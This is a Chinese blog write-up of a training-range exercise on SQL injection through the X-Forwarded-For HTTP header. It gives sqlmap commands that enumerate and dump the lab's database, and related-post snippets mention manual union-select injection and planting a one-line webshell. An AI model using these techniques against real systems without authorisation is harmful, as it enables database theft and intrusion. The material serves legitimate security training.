墨者靶场mysql头注入_靶场练习-墨者学院-sql注入-'X-Forwarded-For' 字段注入

最新推荐文章于 2022-09-11 09:04:06 发布
最新推荐文章于 2022-09-11 09:04:06 发布
阅读量212 收藏 2
点赞数
文章标签: 墨者靶场mysql头注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39926193/article/details/113715705
版权
本文介绍了X-Forwarded-For请求头在HTTP中的作用,以及如何在黑盒测试中利用该头信息寻找SQL注入点。通过Burp Suite抓包并使用sqlmap工具,对登录表单进行参数测试,读取数据库内容,以获取账号和密码信息。
摘要由CSDN通过智能技术生成

X-Forwarded-For知识点:

X-Forwarded-For 是一个 HTTP 扩展头部。

X-Forwarded-For 请求头格式:X-Forwarded-For:client,proxy1,proxy2

X-Forwarded-For: client, proxy1, proxy2

如果一个 HTTP 请求到达服务器之前,经过了三个代理 Proxy1、Proxy2、Proxy3,IP 分别为 IP1、IP2、IP3,用户真实 IP 为 IP0,那么按照 XFF 标准,服务端最终会收到以下信息:

X-Forwarded-For: IP0, IP1, IP2

题目描述

背景介绍

某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测?

实训目标

1、掌握SQL注入的基本原理;

2、了解服务器获取客户端IP的方式;

3、了解SQL注入的工具使用;

解题方向

对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。

解题思路

1.打开靶场环境

e5c77869d8cfa8880aa6504f15e83842.png

2.按题意burp抓包测试X-Forwarded-For字段,可能存在注入点

d3776a730f68aec9f16996b30e097c37.png

acf1dfb8d1c54d27af564323a6c5918f.png

3.将请求头放到txt,sqlmap测试

python2 sqlmap.py -r 1.txt --dbs --batch

37dfd2ad6cee044dca7903cdf5cf85ae.png

python2 sqlmap.py -r 1.txt -D webcalendar --tables --batch

1ba938b9a883ef10aaecea252e1c0c54.png

python2 sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch

1e2f24f3fee5d97f7ed467287337db40.png

python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch

1b50f9ac3bd139743fb543cb233a372f.png

python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch

f6215e54633c6bad37e866079575c072.png

weixin_39926193
关注
墨者学院-SQL注入漏洞测试(HTTP注入)
JimWu的博客
09-04 1301
SQL注入漏洞测试(HTTP注入) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、burpsuite 1.打开靶场,使用burpsuite访问网页,截包。 2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...
墨者学院-HTTP注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1590
一、审题 这题从题目,也可以看放包后的回显可以知道是http的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
墨者学院mysql注入_【墨者学院】:HTTP注入实战(host注入
weixin_36176546的博客
01-19 410
0x00.题目描述:背景介绍安全工程师"墨者"最近在练习MySQL头部注入漏洞,自己刚搭建好一个靶场环境PHP+MySQL。尽情的练习SQL注入吧。实训目标1、掌握SQL注入原理;2、了解手工注入的方法3、了解MySQL的数据结构;4、了解HTTP头部注入;解题方向HTTP头部(HOST注入)0x01.解题思路:靶场环境:主界面墨者网页手动检测注入点:测试行数:联合注入,首先测出是具体哪几行会出现...
墨者学院MySQL--sql注入靶场
weixin_43803070的博客
07-08 1629
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp: 首先找注入点: http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。 http://219.153...
HTTP学习:头部解释+请求消息头部实例
m0_50703652的博客
10-26 300
HTTP 头部解释 第一部分 Accept:告诉WEB服务器自己接受什么介质类型,/ 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。 Accept-Charset: 浏览器申明自己接收的字符集 Accept-Encoding: 浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法 (gzip,deflate) Accept-Language::浏览器申明自己接收的语言语言跟字符集的区别:中文是语言,中文有多种字符集,比如big5,gb2312,
MYSQL HTTP头部注入
AaronLuo
09-06 593
HTTP头部基础 Accept : 浏览器能够处理的内容类型 Accept-Charset : 浏览器能够显示的字符集 Accept-Encoding : 浏览器能处理的压缩编码 Accept-Language : 浏览器当前设置的语言 Connection : 浏览器与服务器之间的连接 cookie : 当前页面设置的cookie Host : 发出请求的页面所在域 Referer : 发出请求...
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6355
墨者学院-X-Forwarded-For注入漏洞实战
墨者学院HTTP注入漏洞测试(X-Forwarded-for)
qq_43817824的博客
07-24 1240
打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。 设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。 3.order by 判断表数量,最后发现是4 4.union select 1,2,3,4测试其注入点的位置是在4,通过union select 1,2,3,(...
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1327
小羊学安全 任重而道远 ~
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3955
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
XSS及SQL注入PPT
05-17
网安培训的PPT 适合安全人员学习 可恶的20个字符限制。
墨者学院--手工注入mysql数据库实例
Louisnie
10-16 1131
开启墨者靶场环境,发现此界面,在点击登陆下方的通知之后惊奇的看到存在参数id,可以试试通过传递SQL语句获取数据库信息. 我们可以试试1=1和1=2大法,输入在参数id=1后面加入1=1进行逻辑判断 显示正常,然后换1=2,因为1=2为一个假命题,如果能插入到数据库进行逻辑判断,那么由于该语句错误,数据库查询不到任何信息,界面就不会显示任何信息 根据这种情况可以大概的判断出该网站很大可能存...
MYSQL注入天书之HTTP头部介绍
weixin_33872566的博客
08-11 65
Background-5 HTTP头部介绍 在利用抓包工具进行抓包的时候,我们能看到很多的项,下面详细讲解每一项。 HTTP头部详解 1、 Accept:告诉WEB服务器自己接受什么介质类型,*/* 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。 2、 Accept-Charset: 浏览器申明自己接收的字符集 Accept-Encoding: 浏览器...
墨者 - SQL注入实战-MySQL
吃肉唐僧的博客
07-10 879
按照题目提示,拿MQo=去base64解码,发现是1 tamper是使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。这里只要用tamper转base64encode 解码,其他和正常的sqlmap用法没区别 爆库,sqlmap -u http://219.153.49.228:44096/...
墨者学院--SQL注入漏洞测试(HTTP注入)
Routine_limon的博客
07-19 928
这道题需要使用到Burp suite这个工具。先简单的说下使用步骤: 简述下4个按钮的作用: ①Forward的功能是当你查看过消息或者重新编辑过消息之后,点击此按钮,将发送消息至服务器端。 ②Drop的功能是你想丢失当前拦截的消息,不再forward到服务器端。 ③Interception is on表示拦截功能打开,拦截所有通过Burp Proxy的请求数据;Interception is ...
墨者 - SQL注入漏洞测试(HTTP注入)
吃肉唐僧的博客
07-07 2539
手动判断注入点 判断字段 判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database...
墨者学院 - SQL注入实战(防注入)-Access
多崎巡礼的博客
09-04 1540
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码 必应一下 access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话 在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了 ...
03#墨者靶场-SQL手工注入漏洞测试(MySQL数据库)
shy的博客
11-15 743
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 1.登陆墨...
墨者学院sql注入 x-f
最新发布
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值